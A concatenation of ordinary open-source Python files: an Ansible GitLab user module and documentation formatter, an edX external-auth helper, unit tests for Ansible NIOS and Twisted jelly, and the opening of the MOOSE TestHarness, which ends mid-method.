login_token="WnUzDsxjy8230-Dy_k"
username=myusername
state=absent
- name: "Create Gitlab User"
local_action: gitlab_user
server_url="https://gitlab.dj-wasabi.local"
validate_certs=true
login_user=dj-wasabi
login_password="MySecretPassword"
name=My Name
username=myusername
password=mysecretpassword
email=me@home.com
sshkey_name=MySSH
sshkey_file=ssh-rsa AAAAB3NzaC1yc...
state=present
'''
RETURN = '''# '''
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except ImportError:
HAS_GITLAB_PACKAGE = False
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.basic import *
class GitLabUser(object):
def __init__(self, module, git):
self._module = module
self._gitlab = git
def addToGroup(self, group_id, user_id, access_level):
if access_level == "guest":
level = 10
elif access_level == "reporter":
level = 20
elif access_level == "developer":
level = 30
elif access_level == "master":
level = 40
elif access_level == "owner":
level = 50
return self._gitlab.addgroupmember(group_id, user_id, level)
def createOrUpdateUser(self, user_name, user_username, user_password, user_email, user_sshkey_name, user_sshkey_file, group_name, access_level):
group_id = ''
arguments = {"name": user_name,
"username": user_username,
"email": user_email}
if group_name is not None:
if self.existsGroup(group_name):
group_id = self.getGroupId(group_name)
if self.existsUser(user_username):
self.updateUser(group_id, user_sshkey_name, user_sshkey_file, access_level, arguments)
else:
if self._module.check_mode:
self._module.exit_json(changed=True)
self.createUser(group_id, user_password, user_sshkey_name, user_sshkey_file, access_level, arguments)
def createUser(self, group_id, user_password, user_sshkey_name, user_sshkey_file, access_level, arguments):
user_changed = False
# Create the user
user_username = arguments['username']
user_name = arguments['name']
user_email = arguments['email']
if self._gitlab.createuser(password=user_password, **arguments):
user_id = self.getUserId(user_username)
if self._gitlab.addsshkeyuser(user_id=user_id, title=user_sshkey_name, key=user_sshkey_file):
user_changed = True
# Add the user to the group if group_id is not empty
if group_id != '':
if self.addToGroup(group_id, user_id, access_level):
user_changed = True
user_changed = True
# Exit with change to true or false
if user_changed:
self._module.exit_json(changed=True, result="Created the user")
else:
self._module.exit_json(changed=False)
def deleteUser(self, user_username):
user_id = self.getUserId(user_username)
if self._gitlab.deleteuser(user_id):
self._module.exit_json(changed=True, result="Successfully deleted user %s" % user_username)
else:
self._module.exit_json(changed=False, result="User %s already deleted or something went wrong" % user_username)
def existsGroup(self, group_name):
for group in self._gitlab.getall(self._gitlab.getgroups):
if group['name'] == group_name:
return True
return False
def existsUser(self, username):
found_user = self._gitlab.getusers(search=username)
for user in found_user:
if user['id'] != '':
return True
return False
def getGroupId(self, group_name):
for group in self._gitlab.getall(self._gitlab.getgroups):
if group['name'] == group_name:
return group['id']
def getUserId(self, username):
found_user = self._gitlab.getusers(search=username)
for user in found_user:
if user['id'] != '':
return user['id']
def updateUser(self, group_id, user_sshkey_name, user_sshkey_file, access_level, arguments):
user_changed = False
user_username = arguments['username']
user_id = self.getUserId(user_username)
user_data = self._gitlab.getuser(user_id=user_id)
        # Let's check whether we need to update the user
for arg_key, arg_value in arguments.items():
if user_data[arg_key] != arg_value:
user_changed = True
if user_changed:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._gitlab.edituser(user_id=user_id, **arguments)
user_changed = True
if self._module.check_mode or self._gitlab.addsshkeyuser(user_id=user_id, title=user_sshkey_name, key=user_sshkey_file):
user_changed = True
if group_id != '':
if self._module.check_mode or self.addToGroup(group_id, user_id, access_level):
user_changed = True
if user_changed:
self._module.exit_json(changed=True, result="The user %s is updated" % user_username)
else:
self._module.exit_json(changed=False, result="The user %s is already up2date" % user_username)
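# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not used by the module): the numeric
# levels hard-coded in GitLabUser.addToGroup above correspond to the GitLab
# API group access levels; the same mapping in table form, for reference only.
GITLAB_ACCESS_LEVELS_SKETCH = {
    'guest': 10,
    'reporter': 20,
    'developer': 30,
    'master': 40,
    'owner': 50,
}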
def main():
global user_id
module = AnsibleModule(
argument_spec=dict(
server_url=dict(required=True),
validate_certs=dict(required=False, default=True, type='bool', aliases=['verify_ssl']),
login_user=dict(required=False, no_log=True),
login_password=dict(required=False, no_log=True),
login_token=dict(required=False, no_log=True),
name=dict(required=True),
username=dict(required=True),
password=dict(required=True),
email=dict(required=True),
sshkey_name=dict(required=False),
sshkey_file=dict(required=False),
group=dict(required=False),
access_level=dict(required=False, choices=["guest", "reporter", "developer", "master", "owner"]),
state=dict(default="present", choices=["present", "absent"]),
),
supports_check_mode=True
)
if not HAS_GITLAB_PACKAGE:
        module.fail_json(msg="Missing required gitlab module (check docs or install with: pip install pyapi-gitlab)")
server_url = module.params['server_url']
verify_ssl = module.params['validate_certs']
login_user = module.params['login_user']
login_password = module.params['login_password']
login_token = module.params['login_token']
user_name = module.params['name']
user_username = module.params['username']
user_password = module.params['password']
user_email = module.params['email']
user_sshkey_name = module.params['sshkey_name']
user_sshkey_file = module.params['sshkey_file']
group_name = module.params['group']
access_level = module.params['access_level']
state = module.params['state']
# We need both login_user and login_password or login_token, otherwise we fail.
if login_user is not None and login_password is not None:
use_credentials = True
elif login_token is not None:
use_credentials = False
else:
module.fail_json(msg="No login credentials are given. Use login_user with login_password, or login_token")
# Check if vars are none
if user_sshkey_file is not None and user_sshkey_name is not None:
use_sshkey = True
else:
use_sshkey = False
if group_name is not None and access_level is not None:
add_to_group = True
group_name = group_name.lower()
else:
add_to_group = False
user_username = user_username.lower()
    # Let's make a connection to the Gitlab server_url, with either login_user and login_password
# or with login_token
try:
if use_credentials:
git = gitlab.Gitlab(host=server_url)
git.login(user=login_user, password=login_password)
else:
git = gitlab.Gitlab(server_url, token=login_token, verify_ssl=verify_ssl)
except Exception:
e = get_exception()
module.fail_json(msg="Failed to connect to Gitlab server: %s " % e)
    # Validate whether the user exists and take action based on "state"
user = GitLabUser(module, git)
    # Check if the user exists; if it does not exist and state == absent, we exit nicely.
if not user.existsUser(user_username) and state == "absent":
        module.exit_json(changed=False, result="User already deleted or does not exist")
else:
# User exists,
if state == "absent":
user.deleteUser(user_username)
else:
user.createOrUpdateUser(user_name, user_username, user_password, user_email, user_sshkey_name, user_sshkey_file, group_name, access_level)
if __name__ == '__main__':
main()
|
hellofreedom/ansible
|
refs/heads/devel
|
hacking/module_formatter.py
|
68
|
#!/usr/bin/env python
# (c) 2012, Jan-Piet Mens <jpmens () gmail.com>
# (c) 2012-2014, Michael DeHaan <michael@ansible.com> and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import print_function
import os
import glob
import sys
import yaml
import codecs
import json
import ast
import re
import optparse
import time
import datetime
import subprocess
import cgi
import warnings
from jinja2 import Environment, FileSystemLoader
from six import iteritems
from ansible.utils import module_docs
from ansible.utils.vars import merge_hash
from ansible.errors import AnsibleError
#####################################################################################
# constants and paths
# if a module is added in a version of Ansible older than this, don't print the version added information
# in the module documentation because everyone is assumed to be running something newer than this already.
TO_OLD_TO_BE_NOTABLE = 1.3
# Get parent directory of the directory this script lives in
MODULEDIR=os.path.abspath(os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir, 'lib', 'ansible', 'modules'
))
# The name of the DOCUMENTATION template
EXAMPLE_YAML=os.path.abspath(os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir, 'examples', 'DOCUMENTATION.yml'
))
_ITALIC = re.compile(r"I\(([^)]+)\)")
_BOLD = re.compile(r"B\(([^)]+)\)")
_MODULE = re.compile(r"M\(([^)]+)\)")
_URL = re.compile(r"U\(([^)]+)\)")
_CONST = re.compile(r"C\(([^)]+)\)")
DEPRECATED = " (D)"
NOTCORE = " (E)"
#####################################################################################
def rst_ify(text):
''' convert symbols like I(this is in italics) to valid restructured text '''
try:
t = _ITALIC.sub(r'*' + r"\1" + r"*", text)
t = _BOLD.sub(r'**' + r"\1" + r"**", t)
t = _MODULE.sub(r':ref:`' + r"\1 <\1>" + r"`", t)
t = _URL.sub(r"\1", t)
t = _CONST.sub(r'``' + r"\1" + r"``", t)
except Exception as e:
raise AnsibleError("Could not process (%s) : %s" % (str(text), str(e)))
return t
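# Illustrative sketch (not from the original script): the kind of substitution
# rst_ify performs on a hypothetical docstring fragment.
#   rst_ify("Use M(copy) with C(src=/tmp) and I(force)")
#   -> 'Use :ref:`copy <copy>` with ``src=/tmp`` and *force*'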
#####################################################################################
def html_ify(text):
''' convert symbols like I(this is in italics) to valid HTML '''
t = cgi.escape(text)
t = _ITALIC.sub("<em>" + r"\1" + "</em>", t)
t = _BOLD.sub("<b>" + r"\1" + "</b>", t)
t = _MODULE.sub("<span class='module'>" + r"\1" + "</span>", t)
t = _URL.sub("<a href='" + r"\1" + "'>" + r"\1" + "</a>", t)
t = _CONST.sub("<code>" + r"\1" + "</code>", t)
return t
#####################################################################################
def rst_fmt(text, fmt):
''' helper for Jinja2 to do format strings '''
return fmt % (text)
#####################################################################################
def rst_xline(width, char="="):
''' return a restructured text line of a given length '''
return char * width
#####################################################################################
def write_data(text, options, outputname, module):
''' dumps module output to a file or the screen, as requested '''
if options.output_dir is not None:
fname = os.path.join(options.output_dir, outputname % module)
fname = fname.replace(".py","")
f = open(fname, 'w')
f.write(text.encode('utf-8'))
f.close()
else:
print(text)
#####################################################################################
def list_modules(module_dir, depth=0):
''' returns a hash of categories, each category being a hash of module names to file paths '''
categories = dict(all=dict(),_aliases=dict())
if depth <= 3: # limit # of subdirs
files = glob.glob("%s/*" % module_dir)
for d in files:
category = os.path.splitext(os.path.basename(d))[0]
if os.path.isdir(d):
res = list_modules(d, depth + 1)
for key in res.keys():
if key in categories:
categories[key] = merge_hash(categories[key], res[key])
res.pop(key, None)
if depth < 2:
categories.update(res)
else:
category = module_dir.split("/")[-1]
if not category in categories:
categories[category] = res
else:
categories[category].update(res)
else:
module = category
category = os.path.basename(module_dir)
if not d.endswith(".py") or d.endswith('__init__.py'):
                    # Windows PowerShell modules keep their documentation in Python stub
                    # files (the stubs are not executed), so skip non-.py files (e.g. .ps1) and __init__.py
continue
elif module.startswith("_") and os.path.islink(d):
source = os.path.splitext(os.path.basename(os.path.realpath(d)))[0]
module = module.replace("_","",1)
                    if source not in categories['_aliases']:
                        categories['_aliases'][source] = [module]
                    else:
                        categories['_aliases'][source].append(module)
continue
if not category in categories:
categories[category] = {}
categories[category][module] = d
categories['all'][module] = d
return categories
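# Illustrative sketch (assumption, not from the original source): the structure
# returned by list_modules() for a hypothetical tree looks roughly like
#   {'all': {'copy': '.../core/files/copy.py', ...},
#    '_aliases': {'new_module_name': ['old_module_name'], ...},
#    'files': {'copy': '.../core/files/copy.py', ...},
#    ...}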
#####################################################################################
def generate_parser():
''' generate an optparse parser '''
p = optparse.OptionParser(
version='%prog 1.0',
usage='usage: %prog [options] arg1 arg2',
description='Generate module documentation from metadata',
)
p.add_option("-A", "--ansible-version", action="store", dest="ansible_version", default="unknown", help="Ansible version number")
p.add_option("-M", "--module-dir", action="store", dest="module_dir", default=MODULEDIR, help="Ansible library path")
p.add_option("-T", "--template-dir", action="store", dest="template_dir", default="hacking/templates", help="directory containing Jinja2 templates")
p.add_option("-t", "--type", action='store', dest='type', choices=['rst'], default='rst', help="Document type")
p.add_option("-v", "--verbose", action='store_true', default=False, help="Verbose")
p.add_option("-o", "--output-dir", action="store", dest="output_dir", default=None, help="Output directory for module files")
p.add_option("-I", "--includes-file", action="store", dest="includes_file", default=None, help="Create a file containing list of processed modules")
p.add_option('-V', action='version', help='Show version number and exit')
return p
#####################################################################################
def jinja2_environment(template_dir, typ):
env = Environment(loader=FileSystemLoader(template_dir),
variable_start_string="@{",
variable_end_string="}@",
trim_blocks=True,
)
env.globals['xline'] = rst_xline
if typ == 'rst':
env.filters['convert_symbols_to_format'] = rst_ify
env.filters['html_ify'] = html_ify
env.filters['fmt'] = rst_fmt
env.filters['xline'] = rst_xline
template = env.get_template('rst.j2')
outputname = "%s_module.rst"
else:
raise Exception("unknown module format type: %s" % typ)
return env, template, outputname
#####################################################################################
def too_old(added):
if not added:
return False
try:
added_tokens = str(added).split(".")
readded = added_tokens[0] + "." + added_tokens[1]
added_float = float(readded)
except ValueError as e:
warnings.warn("Could not parse %s: %s" % (added, str(e)))
return False
return (added_float < TO_OLD_TO_BE_NOTABLE)
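# Illustrative behaviour, given TO_OLD_TO_BE_NOTABLE = 1.3 above:
#   too_old("1.0")   -> True   (the "version added" note is suppressed)
#   too_old("2.0.1") -> False  (only the first two tokens, "2.0", are compared)
#   too_old(None)    -> False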
def process_module(module, options, env, template, outputname, module_map, aliases):
fname = module_map[module]
if isinstance(fname, dict):
return "SKIPPED"
basename = os.path.basename(fname)
deprecated = False
# ignore files with extensions
if not basename.endswith(".py"):
return
elif module.startswith("_"):
if os.path.islink(fname):
            return # ignore, it's an alias
deprecated = True
module = module.replace("_","",1)
print("rendering: %s" % module)
# use ansible core library to parse out doc metadata YAML and plaintext examples
doc, examples, returndocs = module_docs.get_docstring(fname, verbose=options.verbose)
# crash if module is missing documentation and not explicitly hidden from docs index
if doc is None:
if module in module_docs.BLACKLIST_MODULES:
return "SKIPPED"
else:
sys.stderr.write("*** ERROR: MODULE MISSING DOCUMENTATION: %s, %s ***\n" % (fname, module))
sys.exit(1)
if deprecated and 'deprecated' not in doc:
sys.stderr.write("*** ERROR: DEPRECATED MODULE MISSING 'deprecated' DOCUMENTATION: %s, %s ***\n" % (fname, module))
sys.exit(1)
if "/core/" in fname:
doc['core'] = True
else:
doc['core'] = False
if module in aliases:
doc['aliases'] = aliases[module]
all_keys = []
if not 'version_added' in doc:
sys.stderr.write("*** ERROR: missing version_added in: %s ***\n" % module)
sys.exit(1)
added = 0
if doc['version_added'] == 'historical':
del doc['version_added']
else:
added = doc['version_added']
# don't show version added information if it's too old to be called out
if too_old(added):
del doc['version_added']
if 'options' in doc and doc['options']:
for (k,v) in iteritems(doc['options']):
# don't show version added information if it's too old to be called out
if 'version_added' in doc['options'][k] and too_old(doc['options'][k]['version_added']):
del doc['options'][k]['version_added']
all_keys.append(k)
all_keys = sorted(all_keys)
doc['option_keys'] = all_keys
doc['filename'] = fname
doc['docuri'] = doc['module'].replace('_', '-')
doc['now_date'] = datetime.date.today().strftime('%Y-%m-%d')
doc['ansible_version'] = options.ansible_version
doc['plainexamples'] = examples #plain text
if returndocs:
doc['returndocs'] = yaml.safe_load(returndocs)
else:
doc['returndocs'] = None
# here is where we build the table of contents...
try:
text = template.render(doc)
except Exception as e:
raise AnsibleError("Failed to render doc for %s: %s" % (fname, str(e)))
write_data(text, options, outputname, module)
return doc['short_description']
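# Summary added for clarity (not original text): by the time template.render(doc)
# runs above, process_module() has added 'core', 'option_keys', 'filename', 'docuri',
# 'now_date', 'ansible_version', 'plainexamples', 'returndocs' (and possibly 'aliases')
# to the doc dictionary, and may have removed 'version_added' entries that are too old.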
#####################################################################################
def print_modules(module, category_file, deprecated, core, options, env, template, outputname, module_map, aliases):
modstring = module
modname = module
if module in deprecated:
modstring = modstring + DEPRECATED
modname = "_" + module
elif module not in core:
modstring = modstring + NOTCORE
result = process_module(modname, options, env, template, outputname, module_map, aliases)
if result != "SKIPPED":
category_file.write(" %s - %s <%s_module>\n" % (modstring, rst_ify(result), module))
def process_category(category, categories, options, env, template, outputname):
module_map = categories[category]
aliases = {}
if '_aliases' in categories:
aliases = categories['_aliases']
category_file_path = os.path.join(options.output_dir, "list_of_%s_modules.rst" % category)
category_file = open(category_file_path, "w")
print("*** recording category %s in %s ***" % (category, category_file_path))
# start a new category file
category = category.replace("_"," ")
category = category.title()
modules = []
deprecated = []
core = []
for module in module_map.keys():
if isinstance(module_map[module], dict):
for mod in module_map[module].keys():
if mod.startswith("_"):
mod = mod.replace("_","",1)
deprecated.append(mod)
elif '/core/' in module_map[module][mod]:
core.append(mod)
else:
if module.startswith("_"):
module = module.replace("_","",1)
deprecated.append(module)
elif '/core/' in module_map[module]:
core.append(module)
modules.append(module)
modules.sort()
category_header = "%s Modules" % (category.title())
underscores = "`" * len(category_header)
category_file.write("""\
%s
%s
.. toctree:: :maxdepth: 1
""" % (category_header, underscores))
sections = []
for module in modules:
if module in module_map and isinstance(module_map[module], dict):
sections.append(module)
continue
else:
print_modules(module, category_file, deprecated, core, options, env, template, outputname, module_map, aliases)
sections.sort()
for section in sections:
category_file.write("\n%s\n%s\n\n" % (section.replace("_"," ").title(),'-' * len(section)))
category_file.write(".. toctree:: :maxdepth: 1\n\n")
section_modules = module_map[section].keys()
section_modules.sort()
#for module in module_map[section]:
for module in section_modules:
print_modules(module, category_file, deprecated, core, options, env, template, outputname, module_map[section], aliases)
category_file.write("""\n\n
.. note::
- %s: This marks a module as deprecated, which means a module is kept for backwards compatibility but usage is discouraged. The module documentation details page may explain more about this rationale.
- %s: This marks a module as 'extras', which means it ships with ansible but may be a newer module and possibly (but not necessarily) less actively maintained than 'core' modules.
- Tickets filed on modules are filed to different repos than those on the main open source project. Core module tickets should be filed at `ansible/ansible-modules-core on GitHub <http://github.com/ansible/ansible-modules-core>`_, extras tickets to `ansible/ansible-modules-extras on GitHub <http://github.com/ansible/ansible-modules-extras>`_
""" % (DEPRECATED, NOTCORE))
category_file.close()
# TODO: end a new category file
#####################################################################################
def validate_options(options):
''' validate option parser options '''
if not options.module_dir:
print("--module-dir is required", file=sys.stderr)
sys.exit(1)
if not os.path.exists(options.module_dir):
print("--module-dir does not exist: %s" % options.module_dir, file=sys.stderr)
sys.exit(1)
if not options.template_dir:
print("--template-dir must be specified")
sys.exit(1)
#####################################################################################
def main():
p = generate_parser()
(options, args) = p.parse_args()
validate_options(options)
env, template, outputname = jinja2_environment(options.template_dir, options.type)
categories = list_modules(options.module_dir)
last_category = None
category_names = categories.keys()
category_names.sort()
category_list_path = os.path.join(options.output_dir, "modules_by_category.rst")
category_list_file = open(category_list_path, "w")
category_list_file.write("Module Index\n")
category_list_file.write("============\n")
category_list_file.write("\n\n")
category_list_file.write(".. toctree::\n")
category_list_file.write(" :maxdepth: 1\n\n")
for category in category_names:
if category.startswith("_"):
continue
category_list_file.write(" list_of_%s_modules\n" % category)
process_category(category, categories, options, env, template, outputname)
category_list_file.close()
if __name__ == '__main__':
main()
|
si618/pi-time
|
refs/heads/master
|
node_modules/grunt-nose/test/fixtures/virtualenv_exclusive/setup.py
|
2
|
#!/usr/bin/env python
""" This is a test module to test that virtualenv activation works. """
from setuptools import setup
setup(
name='venv_exclusive',
version='0.1.0',
py_modules=['venv_exclusive'],
)
|
kxliugang/edx-platform
|
refs/heads/master
|
common/djangoapps/external_auth/login_and_register.py
|
150
|
"""Intercept login and registration requests.
This module contains legacy code originally from `student.views`.
"""
import re
from django.conf import settings
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import external_auth.views
from xmodule.modulestore.django import modulestore
from opaque_keys.edx.keys import CourseKey
# pylint: disable=fixme
# TODO: This function is kind of gnarly/hackish/etc and is only used in one location.
# It'd be awesome if we could get rid of it; manually parsing course_id strings from larger strings
# seems Probably Incorrect
def _parse_course_id_from_string(input_str):
"""
Helper function to determine if input_str (typically the queryparam 'next') contains a course_id.
@param input_str:
@return: the course_id if found, None if not
"""
m_obj = re.match(r'^/courses/{}'.format(settings.COURSE_ID_PATTERN), input_str)
if m_obj:
return CourseKey.from_string(m_obj.group('course_id'))
return None
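# Illustrative example (hypothetical; the exact match depends on settings.COURSE_ID_PATTERN):
#   _parse_course_id_from_string('/courses/course-v1:edX+DemoX+Demo_2014/courseware')
#   would return the CourseKey parsed from 'course-v1:edX+DemoX+Demo_2014', while a
#   non-course path such as '/dashboard' returns None.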
def _get_course_enrollment_domain(course_id):
"""
Helper function to get the enrollment domain set for a course with id course_id
@param course_id:
@return:
"""
course = modulestore().get_course(course_id)
if course is None:
return None
return course.enrollment_domain
def login(request):
"""Allow external auth to intercept and handle a login request.
Arguments:
request (Request): A request for the login page.
Returns:
Response or None
"""
# Default to a `None` response, indicating that external auth
# is not handling the request.
response = None
if settings.FEATURES['AUTH_USE_CERTIFICATES'] and external_auth.views.ssl_get_cert_from_request(request):
        # SSL login doesn't require a view, so redirect to the branding view and
        # allow it to process the login, provided SSL auth is enabled and the
        # client certificate header is present in the request.
response = external_auth.views.redirect_with_get('root', request.GET)
elif settings.FEATURES.get('AUTH_USE_CAS'):
# If CAS is enabled, redirect auth handling to there
response = redirect(reverse('cas-login'))
elif settings.FEATURES.get('AUTH_USE_SHIB'):
redirect_to = request.GET.get('next')
if redirect_to:
course_id = _parse_course_id_from_string(redirect_to)
if course_id and _get_course_enrollment_domain(course_id):
response = external_auth.views.course_specific_login(request, course_id.to_deprecated_string())
return response
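# Note added for clarity (not original text): the checks above are ordered -- SSL
# certificate auth first, then CAS, then Shibboleth (only when the 'next' parameter
# points at a course with an enrollment domain); otherwise None is returned and the
# normal login view handles the request.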
def register(request):
"""Allow external auth to intercept and handle a registration request.
Arguments:
request (Request): A request for the registration page.
Returns:
Response or None
"""
response = None
if settings.FEATURES.get('AUTH_USE_CERTIFICATES_IMMEDIATE_SIGNUP'):
# Redirect to branding to process their certificate if SSL is enabled
# and registration is disabled.
response = external_auth.views.redirect_with_get('root', request.GET)
return response
|
dagwieers/ansible
|
refs/heads/devel
|
test/units/modules/net_tools/nios/test_nios_a_record.py
|
59
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.modules.net_tools.nios import nios_a_record
from ansible.module_utils.net_tools.nios import api
from units.compat.mock import patch, MagicMock, Mock
from .test_nios_module import TestNiosModule, load_fixture
class TestNiosARecordModule(TestNiosModule):
module = nios_a_record
def setUp(self):
super(TestNiosARecordModule, self).setUp()
self.module = MagicMock(name='ansible.modules.net_tools.nios.nios_a_record.WapiModule')
self.module.check_mode = False
self.module.params = {'provider': None}
self.mock_wapi = patch('ansible.modules.net_tools.nios.nios_a_record.WapiModule')
self.exec_command = self.mock_wapi.start()
self.mock_wapi_run = patch('ansible.modules.net_tools.nios.nios_a_record.WapiModule.run')
self.mock_wapi_run.start()
self.load_config = self.mock_wapi_run.start()
def tearDown(self):
super(TestNiosARecordModule, self).tearDown()
self.mock_wapi.stop()
self.mock_wapi_run.stop()
def _get_wapi(self, test_object):
wapi = api.WapiModule(self.module)
wapi.get_object = Mock(name='get_object', return_value=test_object)
wapi.create_object = Mock(name='create_object')
wapi.update_object = Mock(name='update_object')
wapi.delete_object = Mock(name='delete_object')
return wapi
def load_fixtures(self, commands=None):
self.exec_command.return_value = (0, load_fixture('nios_result.txt').strip(), None)
self.load_config.return_value = dict(diff=None, session='session')
def test_nios_a_record_create(self):
self.module.params = {'provider': None, 'state': 'present', 'name': 'a.ansible.com',
'ipv4': '192.168.10.1', 'comment': None, 'extattrs': None}
test_object = None
test_spec = {
"name": {"ib_req": True},
"ipv4": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
print("WAPI: ", wapi.__dict__)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
wapi.create_object.assert_called_once_with('testobject', {'name': self.module._check_type_dict().__getitem__(),
'ipv4': '192.168.10.1'})
def test_nios_a_record_update_comment(self):
self.module.params = {'provider': None, 'state': 'present', 'name': 'a.ansible.com', 'ipv4': '192.168.10.1',
'comment': 'updated comment', 'extattrs': None}
test_object = [
{
"comment": "test comment",
"_ref": "arecord/ZG5zLm5ldHdvcmtfdmlldyQw:default/true",
"name": "a.ansible.com",
"ipv4": "192.168.10.1",
"extattrs": {}
}
]
test_spec = {
"name": {"ib_req": True},
"ipv4": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
def test_nios_a_record_remove(self):
self.module.params = {'provider': None, 'state': 'absent', 'name': 'a.ansible.com', 'ipv4': '192.168.10.1',
'comment': None, 'extattrs': None}
ref = "arecord/ZG5zLm5ldHdvcmtfdmlldyQw:default/false"
test_object = [{
"comment": "test comment",
"_ref": ref,
"name": "a.ansible.com",
"ipv4": "192.168.10.1",
"extattrs": {'Site': {'value': 'test'}}
}]
test_spec = {
"name": {"ib_req": True},
"ipv4": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
wapi.delete_object.assert_called_once_with(ref)
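    # Note added for clarity (not in the original test): with state == 'absent' and
    # get_object returning an existing record, WapiModule.run() is expected to remove
    # it, which is why delete_object is asserted against the fixture's _ref above.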
def test_nios_a_record_update_record_name(self):
self.module.params = {'provider': None, 'state': 'present', 'name': {'new_name': 'a_new.ansible.com', 'old_name': 'a.ansible.com'},
'comment': 'comment', 'extattrs': None}
test_object = [
{
"comment": "test comment",
"_ref": "arecord/ZG5zLm5ldHdvcmtfdmlldyQw:default/true",
"name": "a_new.ansible.com",
"old_name": "a.ansible.com",
"extattrs": {}
}
]
test_spec = {
"name": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
wapi.update_object.called_once_with(test_object)
|
fxia22/ASM_xf
|
refs/heads/master
|
PythonD/site_python/twisted/test/test_jelly.py
|
2
|
# Twisted, the Framework of Your Internet
# Copyright (C) 2001 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Test cases for 'jelly' object serialization.
"""
from twisted.spread import jelly
from twisted.test import test_newjelly
class JellyTestCase(test_newjelly.JellyTestCase):
jc = jelly
def testPersistentStorage(self):
perst = [{}, 1]
def persistentStore(obj, jel, perst = perst):
perst[1] = perst[1] + 1
perst[0][perst[1]] = obj
return str(perst[1])
def persistentLoad(pidstr, unj, perst = perst):
pid = int(pidstr)
return perst[0][pid]
SimpleJellyTest = test_newjelly.SimpleJellyTest
a = SimpleJellyTest(1, 2)
b = SimpleJellyTest(3, 4)
c = SimpleJellyTest(5, 6)
a.b = b
a.c = c
c.b = b
jel = self.jc.jelly(a, persistentStore = persistentStore)
x = self.jc.unjelly(jel, persistentLoad = persistentLoad)
self.assertIdentical(x.b, x.c.b)
# assert len(perst) == 3, "persistentStore should only be called 3 times."
self.failUnless(perst[0], "persistentStore was not called.")
self.assertIdentical(x.b, a.b, "Persistent storage identity failure.")
class CircularReferenceTestCase(test_newjelly.CircularReferenceTestCase):
jc = jelly
testCases = [JellyTestCase, CircularReferenceTestCase]
|
paulthulstrup/moose
|
refs/heads/master
|
python/TestHarness/TestHarness.py
|
1
|
import os, sys, re, inspect, types, errno, pprint, subprocess, io, shutil, time, copy, unittest
import path_tool
path_tool.activate_module('FactorySystem')
path_tool.activate_module('argparse')
from ParseGetPot import ParseGetPot
from socket import gethostname
#from options import *
from util import *
from RunParallel import RunParallel
from CSVDiffer import CSVDiffer
from XMLDiffer import XMLDiffer
from Tester import Tester
from PetscJacobianTester import PetscJacobianTester
from InputParameters import InputParameters
from Factory import Factory
from Parser import Parser
from Warehouse import Warehouse
import argparse
from optparse import OptionParser, OptionGroup, Values
from timeit import default_timer as clock
class TestHarness:
@staticmethod
def buildAndRun(argv, app_name, moose_dir):
if '--store-timing' in argv:
harness = TestTimer(argv, app_name, moose_dir)
elif '--testharness-unittest' in argv:
harness = TestHarnessTester(argv, app_name, moose_dir)
else:
harness = TestHarness(argv, app_name, moose_dir)
harness.findAndRunTests()
sys.exit(harness.error_code)
def __init__(self, argv, app_name, moose_dir):
self.factory = Factory()
# Build a Warehouse to hold the MooseObjects
self.warehouse = Warehouse()
        # Get dependent applications and load dynamic tester plugins
# If applications have new testers, we expect to find them in <app_dir>/scripts/TestHarness/testers
dirs = [os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))]
sys.path.append(os.path.join(moose_dir, 'framework', 'scripts')) # For find_dep_apps.py
        # Use the find_dep_apps script to get the dependent applications for an app
import find_dep_apps
depend_app_dirs = find_dep_apps.findDepApps(app_name)
dirs.extend([os.path.join(my_dir, 'scripts', 'TestHarness') for my_dir in depend_app_dirs.split('\n')])
# Finally load the plugins!
self.factory.loadPlugins(dirs, 'testers', Tester)
self.test_table = []
self.num_passed = 0
self.num_failed = 0
self.num_skipped = 0
self.num_pending = 0
self.host_name = gethostname()
self.moose_dir = moose_dir
self.base_dir = os.getcwd()
self.run_tests_dir = os.path.abspath('.')
self.code = '2d2d6769726c2d6d6f6465'
self.error_code = 0x0
# Assume libmesh is a peer directory to MOOSE if not defined
if os.environ.has_key("LIBMESH_DIR"):
self.libmesh_dir = os.environ['LIBMESH_DIR']
else:
